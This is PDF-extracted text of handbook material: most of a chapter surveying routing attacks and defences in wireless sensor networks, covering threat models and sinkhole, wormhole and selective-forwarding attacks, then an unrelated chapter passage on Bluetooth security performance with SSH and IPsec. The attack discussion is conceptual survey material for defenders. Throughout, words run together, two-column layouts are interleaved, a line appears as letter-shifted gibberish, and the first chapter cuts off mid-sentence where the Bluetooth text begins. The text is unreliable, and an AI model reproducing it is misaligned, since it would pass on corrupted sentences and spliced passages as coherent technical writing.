network routing. Paper presented at the 2nd ACM Denial-of-Service Attack: An attack aiming
Workshop on Security of Ad Hoc and Sensor at disrupting the acquisition of information within
Networks, New York. a geographical zone or preventing the communi-
cation of alert and signalling messages between
Parno, B. P., A., & Gligor, V. (2005). Distributed
sensor nodes.
detection of node replication attacks in sensor
networks. Paper presented at the IEEE Symposium Key Management: Process of generating,
on Security and Privacy, Oakland, CA validating, exchanging, and renewing asymmetric
and symmetric keys.
Perrig, A. S., R. Tygar, J. D., Wen, V., & Culler,
D. E. (2002). SPINS: Security protocols for sensor Rate Monitoring Attack: A rate monitoring
networks. Wireless Networking, 8(5), 521-534. attack simply makes use of the idea that nodes clos-
est to the base station tend to forward more packets
Perrig, A. S., J., & Wagner, D. (2004). Security in
than those farther away from the base station.
wireless sensor networks. Communications ACM,
47(6), 53-57. Wireless Sensor Network (WSN): Dense col-
lection of tiny sensor motes deployed in a region
Stankovic, J. A. (2003). Real-time communication
of interest to gather information about a speci
and coordination in embedded sensor networks.
phenomenon for later analysis. WSNs allow ef-
ProceedingsoftheIEEE,(7). 19
0
ficient, distributed, and collaborative control

network, “tunnels” of
them to another point in the
various natural and human events. network, and then replays them into the network
from that point.
Wormhole Attack: In a wormhole attack,
an attacker receives packets at one point in the

Chapter XXXVI
Routing Security in Wireless
Sensor Networks
A.R. Naseer
King Fahd University of Petroleum & Minerials, Dhahran
Ismat K. Maarouf
Ashraf S. Hasan
AbstrAct
Since routing is a fundamental operation in all types of networks, ensuring routing security is a necessary
requirement to guarantee the success of routing operation. Securing routing task gets more challenging
as the target network lacks an infrastructure-based routing operation. This infrastructure-less nature that
invites a multihop routing operation is one of the main features of wireless sensor networks that raises
the importance of secure routing problem in these networks. Moreover, the risky environment, application
criticality, and resources limitations and scarcity exhibited by wireless sensor networks make the task
ofsecureroutingmuchmorechallenging.Allthesefactorsmotivateresearcherstofind
and approaches that would be different from the usual approaches adopted in other types of networks.
The purpose of this chapter is to provide a comprehensive treatment of the routing security problem in
wireless sensor networks. The discussion flow of the problem in this chapter begins wit
on wireless sensor networks that focuses on routing aspects to indicate the special characteristics of
wireless sensor networks from routing perspective. The chapter then introduces the problem of secure
routing in wireless sensor networks and illustrates how crucial the problem is to different networking
aspects.Thisisfollowedbyadetailedanalysisofroutingthreatsandattacksthata
routing operation in wireless sensor networks. A research-guiding approach is then presented to the
reader that analyzes and criticizes different techniques and solution directions for the secure routing
problem in wireless sensor network. This is supported by state-of-the-art and familiar examples from the
literature.Thechapterfinallyconcludeswithasummaryandfutureresearchdirectio
Routing Security in Wireless Sensor Networks
IntroductIon can be applied to protect WSNs against some types

of attacks. Key management is the cornerstone
Wireless sensor networks (WSNs) are gaining of security services such as encryption and au-
popularity due to the fact that they provide feasible thentication in wireless sensor network. Research
and economical solution to many of the most chal- seeking low-cost key management techniques that
lenging problems in a wide variety of applications can survive node compromises in sensor networks
such as military applications, healthcare, has been atraffic
very active area, yielding several novel
monitoring, pollution/weather monitoring, wildlife key predistribution schemes. However, there are
tracking, remote sensing, and so forth. This has some attacks for which there is no known preven-
fuelled extensive research to address the critical tion method, such as wormhole attack. Moreover,
issues of providing security, intrusion detection/ there are no guarantees that the preventive meth-
tolerance, high availability, and survivability of ods will be able to hold the intruders. Hence it is
the sensor network. necessary to use some mechanisms of intrusion
The issue of secure routing in wireless and detection. Besides preventing the intruder from
mobile computing is a major challenging design causing damages to the network, the intrusion
factor in different networking aspects. However, detection system can acquire information related to
the problem gets more complicated when consider- the attack techniques, helping in the development
ing infrastructure-less networks that exhibit even of better prevention systems.
more constraints and new types of attacks. In the One special aspect in WSN is the provision of
continuously and rapidly evolving area of wire- secure routing. As mentioned previously, the nature
less communication, the field of wireless of WSN sensor
complicates the security requirements and
networks comes into the picture as a very hot area addsdifficultiesinsolvingsecurityproblems.In
of research in all its aspects. WSN is a multihop fact, secure routing in WSN is actually still not
network that is actually one type of ad hoc net- capturedwellintheresearchfield.Onemainreason
works. However, WSN draws the special attention is that the design of a routing protocol is biased to-
of researchers due to the fact that it exhibits more wards solving the problem of power limitations and
constraints and critical conditions than normal ad reducing communication overhead while keeping
hoc networks in terms of power sources, computing security concerns at a later phase to be integrated
capabilities, memory capacity, and other factors. with the current routing solutions.
This requires different approaches and protocol Among different approaches in solving the
engineering directions from those applied to normal problem of secure routing in WSN, reputation
ad hoc networks. system-based solution is one technique that has
WSNs are susceptible to several types of at- generated enough interest among WSN research-
tacks at different layers of the network since they ing community. Reputation systems attempt to
are normally deployed in open and unprotected provide security by allowing different nodes rate
environments and are constituted of cheap small each other based on their routing activities and
devices with limited computational power, lim- behavior analysis. When a node has an experience
ited memory, and limited battery life. Nodes of a profileaboutitsneighbors,itmayselectthenode
sensor network cannot be trusted for the correct that it trusts more, and, hence, achieve a secure
execution of the critical network functions. Node routing operation.
misbehavior may range from simple selfishness The rest of the chapter is organized as follows.
or lack of collaboration due to the need for power Section 2 of the chapter provides the relevant
saving, to active attacks aiming at denial-of-service background material covering an overview of
andsubversionoftraffic.Asensornetwork WSN that
without includes WSN definition, sensor node
sufficient protection from these attacks structure,may not
applications, and so forth. As WSN is
be deployable in many areas. Intrusion preventive a class of mobile ad hoc networks (MANET), the
mechanisms such as encryption and authentication main differences between WSN and MANET will

be presented. These differences are explained in a whether the solution will prevent the attack or avoid
way that emphasizes to the reader how they make it after detection. This section gives a comparison
WSN an independent research target as compared between these approaches based on the severity
with MANET. of the threats and WSN conditions and resources
Section 3, being the routing security section, availability. In this section, cryptographic-based
definespreciselytheproblemofsecureand routing in
noncryptographic-based approaches will be
general. This section will discuss the requirements discussed and the tradeoffs with resources will
for secure routing in WSN. This will be followed by also be analyzed. Examples of such solutions will
the challenges and constraints in WSN to achieve be provided with a focus on how these solutions
secure routing. After the reader understands the meet secure routing goals and what drawbacks
routing security problem in WSN, the reader will they exhibit. Reputation-based solution will be
be given a critical discussion about the importance discussed as a detection approach by presenting
of this problem. This will also include an explana- the general concept of reputation systems, fol-
tion of the relationship between routing security lowed by suggestions and approaches in reputation
and different network aspects like survivability, systemsolutionsthatcanfitWSNsecurerouting
connectivity and network partitioning, throughput, requirements.
packet delay, and so forth.
Section 4 on routing attacks and threats presents
in brief the different possible communication mod- bAckground
els and trust relationships between WSN nodes that
a threat will be based on. It will clearly show how wireless sensor network overview
researcher assumptions on nodes communication
models and nodes relationships will impact the WSN is an ad hoc-like deployment of a large number
security analysis. In this section, the reader will of sensor nodes that are intended to monitor and
be provided with a global picture of the approaches communicate information pertaining to a phe-
and techniques that are used by the attackers. This nomenon or an event of interest. The deployment
will also include a discussion of the holes and is either random or utilizes predetermined loca-
weakness points that are exploited to achieve such tions near or inside the phenomenon. The typical
attacks. Some examples of famous attacks will be deployment scenario of WSN is depicted in Figure
given with explanation. The explanation will focus 1, where a number of sensor nodes are scattered in
on how the attack works by exploiting the routing thesensorfield.Thesensornodescollectdatafro
protocol aspects. Thus, the section will also show thefieldandroutethedatathroughthemultih
the robustness level that is provided by different structure of the network to a specialized node
routing protocols. How we can think secure and referred to as the sink or base station. Finally, the
provide robust solutions against routing attacks sink may communicate the raw data or a processed
and threats will be the subject of this section. The version to the end-user utilizing an infrastructure
section gives examples of how an attack can be network such as the Internet.
prevented or detected as a tip for a more general
approach. Applications of wsn
Section 5, “Routing Security Solutions and
Techniques,” explains the objectives to be met Duetotheversatilityandexibility fl ofWSN,ithas
when developing a routing security solution. These found many applications especially in situations
security objectives are explained under the lights where direct probing or measurement of the event
of WSN constraints. Thus, the reader will be aware of interest is either costly or risky. WSNs facilitate
of the tradeoffs that should be considered in the many applications including:
design.Afirststepinthesolutiondesignistodecide

Figure1.Sensornodesdeploymentinasensorfield
Infrastructure Sink Sensor Field

Network
Sensor node
User
• Military applications: ° Tracking and monitoring doctors and

° Monitoring friendly forces, equipment, patients inside a hospital
and ammunition • Facility management and commercial
° Battlefieldsurveillance aApplications:
° Reconnaissance of opposing forces and ° Managing inventory
terrain ° Monitoring product quality
° Targeting guidance ° Robot control and guidance in automatic
° Battle damage assessment manufacturing environments
° Nuclear, biological ,and chemical (NBC) ° Interactive museums
attack detection and reconnaissance ° Smart structures with sensor nodes
• Environmental and precision agriculture embedded inside
Applications: ° Vehicle tracking and detection
° Tracking the movements of birds, small ° Machine surveillance and preventive
animals, and insects maintenance
° Monitoring environmental conditions ° Intelligent building
that affect irrigation • Telematics:
° Earth, and environmental monitoring in ° Forroadsandtrafficmanagement
marine, soil, and atmospheric contexts
° Forestfiredetection sensor node structure
° Meteorological or geophysical re-
search The basic structure of the sensor node is shown
° Flood detection in Figure 2(a), while the protocol stack for the
° Pollution study node is shown in Figure 2(b). The node contains
° Fertilizer and humidity sensing for an embedded system that performs the following
farms main functions:
• Health applications:
° Providing interfaces for the disabled • Sensing: Every node should have the ability
° Integrated patient monitoring to observe and/or control the physical envi-
° Administration in hospitals ronment.
° Telemonitoring of human physiological • Computing: The collected data from physical
data environment through sensing function are

processed to produce beneficial - informaand memory units of sensor nodes are

processing
tion. still scarce resources. For instance, the processing
• Communication: Every node should be able unit of a smart dust mote prototype is a 4 MHz
to communicate and exchange raw data or Atmel AVR8535 micro-controller with 8 KB in-
processed information among them. structionash fl memory,bytes
21 5 RAM,and2 1 5
bytes EEPROM (Perrig, Szewezyk, Wen, Culler,
To accomplish the above tasks, the sensor node & Tygar, 2001). TinyOS operating system is used
comprises of four main components: the control- on this processor, which has 3500 bytes OS code
ler/memory module, the power supply module, the space and 4500 bytes available code space.
RF transceiver module, and the sensors/actuators
module. In addition, the sensor unit may optionally Power supply module: One of the most im-
contain two other modules, namely, the position portant components of a sensor node is the power
findingmoduleandthemobilizermodule. While
unit. Since the sensor nodes are often inaccessible,
the former module is sometimes needed to deter- power is considered a scarce resource and the life-
mine the location of the node, the latter allows time of a sensor network depends on the lifetime
mobilizing the node to carry out certain tasks in of the power resources of the nodes. Power is also
thefieldofinterest.Thebriefdescription a scarceof these
resource due to the size limitations. For
modules of a sensor node is presented next. instance, the total stored energy in a smart dust
mote is of the order of 1 J (Pottie & Kaiser, 2000).
Controller/memory module: The controller It is possible to extend the lifetime of the sensor
consists of a processor and a memory system. The networks by energy scavenging, which means
processor manages the procedures that make the extracting energy from the environment. Solar
sensor node collaborate with the other nodes to cells are an example for the techniques used for
carry out the assigned sensing tasks. The memory energy scavenging.
system stores data, software, and application pro-
grams required to run the node. Though the higher Radio transceiver module: The radio trans-
computational powers are being made available in ceiver unit is responsible for connecting the node
smaller and smaller processors and controllers, to the network.
Figure 2. Wireless sensor network: (a) node structure, and (b) protocol stack
Mobilizer Position Finding System

Task Management
Application Layer
Mobility Management
Controller
RF Sensor/
ADC
Transceiver Actuator
Power Management
Memory
Transport Layer
Network Layer
Power
Power unit
generator
Data Link/MAC Layer
Typical module
Physical Layer
optional module
(a) (b)
Figure 2: Wireless sensor network: (a) node structure, and (b) protocol stack.

Sensors/actuators module: Sensing and Resource constraints: An obvious difference

actuator units are usually composed of sensors, between MANET and WSN is resource constraints.
actuators, and analog to digital (for sensing) and Resources include power, memory, and processing
digital to analog (for actuating) converters (ADC/ capabilities. Although both networks suffer from
DAC). The analog signals produced by the sensors resourcedeficiency,WSNsaremoreconstrained
based on the observed phenomenon are converted and limited by such resources, especially in power.
to digital signals by the ADC, and then fed into MANET nodes are typically laptops or handheld
the processing unit or the controller. On the other devices that have greater provisions in terms of
hand, the digital signals produced by the control- power and processing capability which is not the
ler are converted to analog signals by the DAC to case for little sized sensor nodes. Any protocol
feed the actuators. design and implementation targeting WSN from
the physical to the application layer must consider
Position finding module: In some instances, resource usage optimization not as an additional
the operation of the sensor node, as in some of the feature in the system but as a main design goal.
routing techniques, requires knowledge of location
with high accuracy. These nodes will be equipped Communication and topology models: The
with a module that is used to determine either the most used communication model adopted for MA-
relative or absolute location of the node. The deter-NET is the point-to-point model. While this model
mination of the absolute location can be obtained is also applicable in WSN, other communication
using global positioning system (GPS), while the models such as broadcasting and multicasting are
relative location can be calculated using the less more realistic and representative of the intended
expensive signal triangulation or multilateration applications. In addition, the topology for WSN
techniques (Savvides, Han, & Srivastava, 2001). is highly variable compared to that for MANETs.
The loss of a sensor node due to a battery running
Mobilizer module: For particular application out or destruction results in a topological change
of WSN, it may be required to move a subset of in the network for which the WSN has to respond
thedeployedsensornodeintospecificand positions in
self-organize.
thefieldofinterest.Forthesenodes,themobilizer
module allows the node to move or change its loca- Application characteristics: WSN targets a
tion to perform the required task. great range of applications as mentioned in section
2.2. Therefore, WSN is expected to have different
wsn vs. MAnEt requirements in terms of node density, sensing
functions, routing activity, and so forth compared
While WSN and mobile ad hoc networks share a to those for MANET. This variation also exists in
lot of commonalities, there are distinct differences MANET but to a lesser degree as the number of
that exist between the two technologies. These dif- applications for ad hoc networks is not as great as
ferences include the following characteristics. that for WSN.
Node population: Typically the number of Addressing and identification: WSN nodes
nodes deployed in a WSN is orders of magnitude usuallydonotpossessauniqueidentificationIDas
greater than the number of nodes in a MANET. opposed to ad hoc node in a MANET where every
This is of course a function of the application nodeisidentifiedbyitsmediaaccesscontrol(MAC)
and the sensor field. In addition, wireless addresssensor
or the Internet address. Nodes within a
nodes usually have shorter communication range sensorfieldorganizeandestablishamechanismto
compared to their counterparts in MANET. This identify adjacent nodes and perform the required
implies that the deployment density for sensor functionality.
nodes may be significantly higher than that for
the MANET.

routIng sEcurIty having a secure routing protocol or framework

can protect data exchange, secure information
what is routing security delivery, and maintain and protect the value of the
communicated information.
Routing is a fundamental operation in almost all Insecure routing can cause performance deg-
types of networks because of the introduction of radation as well. For example, nonforwarding at-
interdomain communication. Ensuring routing se- tacks decrease the system throughput since packets
curity is a necessary requirement to guarantee the will be retransmitted many times and they are not
success of routing operation. When we talk about delivered. Denial-of-service attacks can increase
secure routing, we are concerned with security the packet delay since some nodes acting as rout-
problems that may occur due to improper actions ers will be busy in responding to the attack and
from an assumed router. These undesired actions enforced to delay the processing of other packets.
can be related either to the router identity or the An infected WSN network can be partitioned into
router behavior. If the router has an undesirable different parts that cannot communicate among
identity or authorization, the router is considered each other due to nonforwarding attacks. This
as an intruder who might perform serious attacks. leads to the demand of increasing the number of
Such attacks can be avoided by providing security sensors or changing the node deployment to return
services that validate the routers’ identities. On the the network connectivity. This is very expensive;
other hand, a router that misbehaves in the network however, it can be avoided if a good secure routing
by performing undesirable routing operations also solution is adopted.
contributes to the routing security problem. How- Network resources are also affected by insecure
ever, the attacks caused by misbehaving routers routing. For example, denial-of-service attacks
can be avoided by mechanisms that validate and effect resource availability, whether we consider
evaluate the router behavior in the network. an offended node as a resource for routing or we
Secure routing tasks get more challenging as consider the availability of data itself. Also, this
the target network lacks an infrastructure-based attack forces offended nodes to consume unneces-
routing operation. This infrastructure-less nature sary energy on packet reception and processing.
that invites a multihop routing operation is one As we can see, the information value and the
of the main features of WSN networks that raise network performance are directly affected by the
the importance of secure routing problem in these security level of the routing operation in WSN.
networks. Moreover, the risky environment, ap- A secure routing solution, thus, should provide
plication criticality, and resources limitations and information protection and performance main-
scarcity exhibited by WSN networks make the tasks tenance. However, any proposed solution should
of secure routing much more challenging. account for the overhead impact on the network
performance. For example, a secure routing solu-
why routing security is Important in tion may introduce an overhead that decreases the
wsn network throughput. If this degradation is more
than the one resulted from the attack; it is better
Secure routing in WSN is important for both not to implement the solution in this regard.
securing obtained information as well as protect-
ing the network performance from degradation.
Most WSN applications carry and deliver very routIng AttAcks And tHrEAts
critical and secret information like in military In wsn
and health applications. A WSN network infected
by malicious nodes can alter or inject incorrect The designing of a secure routing protocol becomes
information, misroute packets, analyze data, or very essential as the weaker defender (i.e., sensor
do not forward packets to their destination. Thus, nodes) in the sensor network has the greatest inher-

ent disadvantage of insecure wireless communi- Considering the above modified model, the
cation, limited node capabilities, possible insider attacks can be categorized as passive and active
threats, and the stronger attacker has the all-time attacks. In passive attacks, eavesdropper can
advantage of possessing powerful laptops with high continuously monitor the whole sensor network
energy and long range communication to launch and can launch two types of passive attacks: (i)
severe attack to the network. Most of the routing cipher text attack wherein given the cipher text,
protocols have not been designed with security as the adversary tries to recover the encryption key,
a goal. All of the proposed network routing pro- and (ii) chosen plain text attack wherein the at-
tocols in the literature are more prone to attacks. tacker can feed the sensor with known data and
Attackerscanattractorrepeltraffic ows,
fl observe
then increase
the encrypted message sent by the
latency, or disable the entire network, sometimes sensor. In active attacks, the attacker can capture a
with little effort. sensor, stealing all the information and keys stored
in the sensor. Hence, providing, maintaining, and
threat Models ensuringproperconfidentialityandauthenticit
data is a paramount importance within the limited
Inordertodefinearobustsecuritymodel, - specifica
inherent constraints of the underlying wireless
tion of both the security requirements and the threat sensor networks.
model are required. The security requirements Sensornetworkattackerscanbeclassifiedint
identify the properties that have to be enforced two categories depending upon their capabilities
and the initial assumptions. The threat model (Karlof & Wagner, 2003). They are mote-class
formulates the hypothesis regarding the attacker’s attacker and laptop-class attacker.
capabilities and its possible behavior. A common Mote-class attacker has access to a few ordinary
assumption is that the attacker is compliant with sensor nodes with lesser capability and might only
the Dolev-Yao threat model (Dolev & Yao, 1983) be able to jam the radio link in its immediate vicin-
which is often used to formally analyze crypto- ity. They have limited range and cannot eavesdrop
protocols in communication networks. According on entire network, moreover, cannot coordinate
to this model, when two communicating parties their efforts to bring down the network.
communicate over an insecure channel, the attacker Laptop-class attacker has access to more power-
can gain control over the communication network ful devices like laptops with greater battery power,
to perform the following actions: more capable processor, a high-power transmitter,
and a sensitive antenna. These attackers might be
• Over hear the messages between the parties, able to jam the entire network using a stronger
intercept them, and prevent their delivery to transmitter and might be able to eavesdrop on an
the intended recipient. entire network. Laptop-class attackers might pos-
• Introduce forged messages into the system sess a high bandwidth, low-latency communication
using all the available information. channel invisible to legitimate sensor nodes thereby
setting up separate channels to allow such attackers
But this threat model also assumes that the end to communicate and coordinate their efforts.
nodes are not themselves subject to attack. In order Further,sensornetworkattackscanbeclassifie
to take into account the distinguishing feature of as outsider (external) attacks and insider (internal)
WSNs that the sensors may be unattended and end attacks. Outsider attacks are launched by outsiders
nodes cannot, in general, be trusted, the following who have no special or legitimate access to the
more powerful action is required to be included sensor network, that is, they do not have authentic
in the model: keying material to participate in network operations
as legitimate nodes. Insider attacks occur when
• An attacker can capture a sensor node and an authorized participant in the sensor network
acquire all the information stored within it. has gone bad or compromised. The insider attack

may be mounted from either compromised sen- we consider tactical military network deployment
sor nodes running a malicious code or attackers forwar-fieldsurveillance,whereasfornoncritica
using laptop-class devices to attack the network commodity, sensor networks a less strong threat
after stealing the key material, code and data from modelmaysuffice.
legitimate nodes. Outsider attackers, once in full Anewthreatmodeltocommunication - confiden
control of certain nodes, can become insider ones tiality in WSNs termed as “smart attacker model” is
able to launch more subtle attacks. Insider attacks introduced by Di Pietro, Mancini, and Mei (2006).
aregenerallymoredifficulttodefendagainst than predeployment schemes (see
All the random-key
the outsider ones because of their possession of section 5 for detailed discussion) proposed in the
keying material. literature use an oblivious attacker model that at
In most of the threat models proposed in the each step the attack sequence randomly chooses
literature, it is assumed that the environments a sensor node to tamper without taking advantage
in which the sensors deployed are risky and un- of the information regarding the keys acquired
trusted. Each sensor trusts itself, but sensors do during the previous attacks. Contrary to this, the
not trust each other. Further, it is assumed that all smart attacker model greedily uses the previous
the compromised sensors in the sensor network attacks keys acquired information to choose the
are compromised by the same attacker and thus best sensor to tamper with in order to compromise
collude to compromise the network. The attacker the communication confidentiality. This reduces
may compromise multiple sensor nodes in the net- greatlythelevelofcommunicationconfidentiali
work, and there is no upper bound on the number of provided by all the random key predeployment
compromised nodes. However, the attacker cannot schemes
compromise the base station, also termed as sink,
which is typically resourceful and well protected. routing Attacks and Examples
Once a sensor node is compromised, all the secret
keys, data, and code stored on it are exposed to Any event that decreases or eliminates a network’s
the attacker. The attacker can load a compromised capacity to perform its expected function is termed
node with secret keys obtained from other nodes, as a denial-of-service attack or commonly known
termed as collision, among compromised nodes. In as a DoS attack (Wood & Stankovic, 2002). Some
other words, the goal of the attacker is to uncover of the major causes for DoS attacks are hardware
the keys used in the system in order to disrupt failures, software bugs, resource exhaustion, ma-
the network operation. In order to achieve this, licious attacks, and environmental conditions. A
the attacker compromises individual nodes and significantchallengeinsecuringlarge - sensornet
fosters collusion among nodes. The main objective works is their inherent self-organizing, decentral-
of node collusion is to incrementally aggregate the ized nature. Many of the network deployments are
uncovered keys of individual nodes to a level that vulnerable to immensely more powerful attackers.
allencryptedtrafficinthenetworkis completely
Considering the layered network architecture of
revealed. It is also assumed that the attacker can- sensor networks depicted in Figure 2(b), the DoS
not successfully compromise a node during the vulnerabilitiestothefirstfourlayersofthes
sensor deployment phase which is short, that is, canbeidentified(Wood&Stankovic,)as: 02
the interval of tens of seconds when each sensor
bootstraps itself, during which the sensor nodes • Physical layer attacks: The most common
obtain their location information and derive few attacks to the physical layer of a WSN are
keys. Indeed, such attacks can be prevented in jamming and node physical tampering.
many of the real-life scenarios when appropriate • Data link layer attacks: Collisions, unfair-
network planning and deployment are carried out ness, or exhaustion of resources are the at-
to keep away attackers during the bootstrapping tacks that can be launched against the data
process. However, it should be noted that stronger link layer of a sensor network.
threat (attacker) models need to be applied when
0
• Network layer attacks: The possible rout- For example, since routing updates are not
ing layer attacks are routing information authenticated in a TinyOS beaconing protocol, it
spoofing, alteration or replay, blackhole is possible for any malicious node to claim itself
and selective forwarding attacks, sinkhole to be a base station and become the destination
attacks, Sybil attacks, wormhole attacks, ofalltrafficinthenetwork.Moteclassattacker
HELLOood
fl attacks,andacknowledgement can create very easily routing loops by spoofing
spoofing. routing updates. In GPSR, an adversary can forge
• Transport layer attacks: The most common location advertisements to create routing loops in
attackstotransportlayerareooding fl dataattacks
ows
fl without having to actively participat
and desynchronization attacks. in packet forwarding.
Since our main focus in this chapter is towards Black hole and selective forwarding attack:
routing security, a detailed discussion on network Multihop networks basically work on the assump-
layer or routing attacks will be presented next. tion that nodes will participate faithfully in the
Sensornetworkroutingattackscan beclassified
forwarding of the received messages. In a blackhole
into the following categories (Karlof & Wagner, attack, a malicious node refuses to forward every
2003): packet it receives thereby behaving like a block hole.
In a selective forwarding attack, a malicious node
• Routing information spoofing, alteration selectivelyorforwards the packets, that is, a mali-
replay cious node may refuse to forward certain messages
• Blackhole and selective forwarding attacks and simply drop them thereby ensuring that these
• Sinkhole attacks packets are not propagated any further. The mali-
• Sybil attacks cious node interested in suppressing or modifying
• Wormhole attacks the packets originating from a few selected nodes
• HELLOood
fl attacks canreliablyforwardtheremainingtrafficthereby
• Acknowledgementspoofing limiting the suspicion of its misbehavior. In order
to launch a selective forwarding attack effectively,
Routing information spoofing, alteration, the attacker must follow the path of least resistance
or replay: Targeting the routing information ex- and attempt to include explicitly the attacker’s self
changed between the nodes is the most direct attack ontheactualpathofthedataow. fl
againstaroutingprotocol.Byspoofing,altering,
or replaying routing information, an attacker can Most of the sensor network routing protocols
disrupt the network by creating routing loops, at- such as TinyOS beaconing, directed diffusion
tractingorrepellingnetworktraffic,and extending or variant, geographic routing
its multipath
shortening source routes, generating false error (e.g., GPSR, GEAR), minimum cost forwarding,
messages, partitioning the network, or increasing clustering-based protocols (e.g., LEACH, TEEN,
the end-to-end latency. PEGASIS), and rumor routing, are highly prone
to selective forwarding attacks.
Most of the sensor network routing protocols For example, In LEACH protocol, nodes choose
such as TinyOS beaconing, directed diffusion a cluster-head based on received signal strength. A
and its multipath variant, geographic routing laptop-class attacker can take advantage of this to
(e.g., GPSR, geographic and energy aware routing send a powerful advertisement to all nodes in the
[GEAR]), minimum cost forwarding, rumor rout- network in order to mount a selective forwarding
ing, energy conserving, and topology maintenance attack on the entire network using a small number
protocols (e.g., SPAN, GAF, CEC, AFECA) are of nodes if the target number of cluster-heads or
prone to bogus routing information attacks. thesizeofthenetworkissufficientlysmall.

Sinkhole attacks: In a sinkhole attack, the goal

RI WKH DWWDFNHU LV WR DWWUDFW QHDUO\ DOO WKH WUDI¿F
from a particular region through a compromised
node, thereby creating a metaphorical sinkhole
with the attacker at the center. Sinkhole attacks
typically work by making a compromised node
appear especially attractive to surrounding nodes
with respect to the routing algorithm.
Most of the sensor network routing protocols

such as TinyOS beaconing, directed diffusion and
its multipath variant, minimum cost forwarding,
and rumor routing are prone to sinkhole attacks
For example, a laptop-class attacker with a
powerful transmitter can actually provide a high
quality route by transmitting with enough power
to reach the base station in a single hop. Because
of this high quality route through the compromised
node, each neighboring node of the adversary will
forward packets destined for a base station through
the adversary and also propagate the attractiveness
of the route to its neighbors. Due to the specialized
communication pattern used, hierarchical sensor
networks are highly susceptible to sinkhole attacks.
In hierarchical sensor networks, all packets share
the same ultimate destination, that is, a base station;
a compromised node is required only to provide a
single high quality route to the base station in order
to attract a potentially large number of nodes.
Wormhole attacks: In the wormhole attack, an

attacker tunnels messages received in one region
of the network over a low-latency link and replays
them in a different region. Wormhole attacks more
commonly involve two distant malicious nodes
colluding to understate their distance from each
other by relaying packets along an out-of-bound
592
Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections
quadruple in number between now and 2008, from link layer. Virtually all Bluetooth devices support
under 100 million to about 440 million. Bluetooth this feature, and it is, in most cases, considered to
enabled devices are used in several different envi- be adequately secure. However, this may not be
ronments and cover a wide range of applications. applicable for all deployment scenarios. In order to
For instance, for mobile applications, the device establish a secure channel with another Bluetooth
periodically connects to the network to download device, a preshared secret called PIN is required. A
music,totransferfiles,ortosynchronize withone’s
symmetric key is generated from this PIN. On cus-
desktoponcalendarandotherfiles.Consequently, tomer devices this PIN typically consists of four or
the safety and security of these applications, for fivedigits.Supposingawholepiconetnetworkwould
instance, the security of the private information utilize this PIN to encrypt its communication, anyone
stored on the devices, becomes a major issue. By acquiring this PIN could theoretically decrypt all
attacking actively or passively the communica- communication. On top of that, in applications like
tion link, aggressors could obtain personal and VoIP that mandate IP connectivity to access points
also important business data. However, security (APs), the encryption would end at the AP, which
features (Gehrmann, Persson, & Smeets, 2004) means that the AP, or any host that can manipulate
must be carefully considered and analyzed in order the communication between the Mobile Device and
to decide whether Bluetooth technology indeed the other end, can expose the data (see Figure 1).
provides the right answer for any particular task Thus, it is obvious that Bluetooth encryption is not
or application. well suited for all applications which may exploit
The Bluetooth standard has been long criticized Bluetooth connections.
forvariousvulnerabilitiesandsecurity - Under inefficien
these circumstances and for certain
cies, as its designers are trying to balance between classes of security sensitive applications deployed
performance and complementary services includ- in Bluetooth PAN networks, the investigation of
ing security. So far, both the Bluetooth Special complementary and advanced security protocols
Interest Group (SIG) (Bluetooth SIG, 2003) and apart from Bluetooth’s native security mechanisms,
severalresearchershavemadesignificant - even if contribu
deployed as an interim countermeasure, is
tions on Bluetooth security aspects, discovering an interesting research issue. On the other hand, as
numerous vulnerabilities and potential weaknesses Bluetooth wireless technology is targeting devices
and proposing solutions (Adam, 2003; Gehrmann, with particular needs and constraints (e.g., process-
& Nyberg, 2002; Jacobson & Wetzel, 2001; Persson ing power and battery consumption) the trade-offs
& Manivannan, 2003; Shaked & Wool, 2005). For between security services and performance must be
example, the Bluetooth pairing procedure has been carefully considered. Furthermore, considering that
anticipated to be weak under certain circumstances. radio links in general suffer from limited bandwidth
Moreover, other categories of threats, either active and are unreliable by nature, performance issues
or passive, have also been investigated, including must be thoroughly investigated to make a decision
ad hoc security issues, malicious software like whether certain security protocols and their mecha-
“Cabir,” war-nibbling, and so forth. nisms are advantageous over Bluetooth connections,
An obvious choice for any Bluetooth application delivering robust and agile security services within
would be to use Bluetooth encryption provided at tolerable service response times.
Figure 1. Sample scenario that mandates upper layer security

During the last few years, several researchers Experiments shall employ both Bluetooth native
have examined various Bluetooth security param- security mechanisms as well as the two aforemen-
eters and some of them do explore performance tioned protocols. Through a plethora of scenarios,
parameters (e.g., Chakraborty, 2000; De Morais utilizing both laptops and palmtops, we intend
Cordeiro, Sadok, & Agrawal, 2001; Francia, Kilaru, to offer a comprehensive in-depth comparative
Le Phuong, & Vashi, 2004; Golmie & Rebala, 2003; analysis of each of the aforementioned security
Howitt, 2002; Karnik & Kumar, 2000; Kitsos et mechanisms when deployed over Bluetooth com-
al., 2003; Lim et al., 2001; Miorandi, Caimi, & munication links.
Zanella, 2003; Wang, Arumugam, & Krishna, The rest of the chapter is structured as fol-
2002). However, to the best of our knowledge, none lows. The next section gives an overview of our
of these works focus on performance evaluation experimental test-bed related parameters and
comparing Bluetooth’s native security mechanisms procedures, while the third section presents the
with well-respected, strong security protocols like derived performance measurement results. The
IPsec and SSH. forth section offers an analytical discussion over
The chapter will focus on the performance of the conducted results. The chapter finishes wit
existing protocols and mechanisms rather than on some concluding thoughts and future directions
security itself, estimating the performance of both of this work.
the built-in Bluetooth security mechanisms, namely
security modes, and two other standard security
protocols operating at different layers of the TCP/IP ExPErIMEntAl frAMEwork
protocol suite, namely SSH and IPsec. Protocols dEscrIPtIon
likeSSHandIPsecproviderobust,exible, fl costless,
and easy to implement solutions for exchanging The experimental topology consists of two pairs
data over insecure communication links. However, of machines. The first pair of Bluetooth devices
although their deployment is a well established and employs a laptop and a palmtop machine, while
accustomed practice in the wireline world, more the other consists of two similar laptop machines.
research effort is needed for wireless links, due to The members of each pair are located at 10 meters
the several aforementioned limitations. Depending apart and connected via Bluetooth adapters (or
on the scenario involved, the user may utilize SSH built in Bluetooth chip), thus forming a small two-
or IPsec security services, either individually or member wireless PAN (WPAN) or piconet. The
in combination with Bluetooth security modes, main components’ characteristics, both software
allowing applications to communicate securely, and hardware, are presented in Table 1. To estimate
constructing a secure tunnel. Thus, in a sense, the the performance of the Bluetooth network, the data
whole procedure can also be seen as the deployment were transmitted from one network node (server)
of small VPNs in Bluetooth PANs. Note however, to the other (client). Hence, in order to record the
thattheefficiencyoftheSSHandIPSecdepends incoming and outcoming packets between the cor-
mainly on the performance of the used end-system. responding network entities and to calculate the
